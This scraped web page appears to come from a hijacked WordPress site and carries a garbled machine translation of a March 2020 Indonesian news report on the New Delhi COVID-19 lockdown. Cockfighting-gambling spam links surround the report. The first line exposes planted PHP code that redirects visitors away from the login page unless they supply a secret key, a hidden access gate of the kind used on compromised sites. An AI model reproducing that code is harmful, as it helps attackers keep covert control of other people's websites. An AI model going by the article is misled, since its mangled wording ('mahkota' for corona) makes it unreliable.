//̨¼ add_action('login_enqueue_scripts','login_protection'); function login_protection(){ if($_GET['word'] != '2868973770')header('Location: https://www.baidu.com/'); } Untuk mencegah penyebaran mahkota, pemerintah India mengumumkan blokade di New Delhi hingga 31 Maret 2020 | adu ayam bali_s128.net login_s128.live

Untuk mencegah penyebaran mahkota, pemerintah India mengumumkan blokade di New Delhi hingga 31 Maret 2020

Menurut reporter Tribunnews.com Larasati Dyah Utami-New Delhi TRIBUNNEWS.COM-Pemerintah Kota New Delhi mengumumkan pada tanggal 31 Maret 2020 penutupan New Delhi untuk mencegah penyebaran coronavirus atau gejala Covid-19.

Menurut informasi yang dikeluarkan oleh Kementerian Luar Negeri Indonesia (Kementerian Luar Negeri Indonesia), melalui Perjalanan Aman Senin (23 Maret 2020), kebijakan Pemerintah Kota New Delhi akan dimulai pada hari Minggu (22 Maret 2020) Berpengaruh.

Otoritas New Delhi juga akan menutup semua penerbangan dan lalu lintas yang memasuki kota dari New Delhi.

Ini juga mempengaruhi penutupan semua toko di New Delhi .

Baca: Cegah Corona PT KAI membatalkan 19 perjalanan kereta api. Ini adalah masalah yang harus diperhatikan oleh calon penumpang .

Baca: Maskapai penerbangan Indonesia Pilot meninggal, ini adalah kata-kata dari Kementerian Transportasi – Baca: 2 Fatwa baru yang diminta oleh Wakil Presiden, doa-doa Wuwudu untuk dokter dan pemandian – undang-undang kebijakan adalah untuk menutup semua toko, tetapi tidak untuk Toko untuk bahan baku, obat-obatan dan kebutuhan dasar lainnya. “Permohonan Kementerian Luar Negeri dan Perjalanan Aman mengatakan.

Kementerian Luar Negeri telah meminta warga negara Indonesia (berencana untuk melakukan perjalanan ke India, terutama WNI di New Delhi) untuk menunda perjalanan.

Adapun untuk pergi ke Indka Warga negara Indonesia, mereka harus mengatur untuk segera kembali ke Indonesia, jangan sampai kebijakan lain mempersulit warga negara Indonesia untuk kembali ke Indonesia .

Untuk warga negara Indonesia yang tinggal di India, dalam keadaan darurat, Anda dapat menghubungi +918826590097 atau melakukan perjalanan melalui aplikasi keamanan Tekan tombol darurat untuk menghubungi hotline Kedutaan Besar Indonesia di New Delhi.

Sampai Senin (23 Maret 2020), pemerintah India telah mengkonfirmasi 418 kasus positif virus korona.

Leave a comment

adu ayam bali_s128.net login_s128.live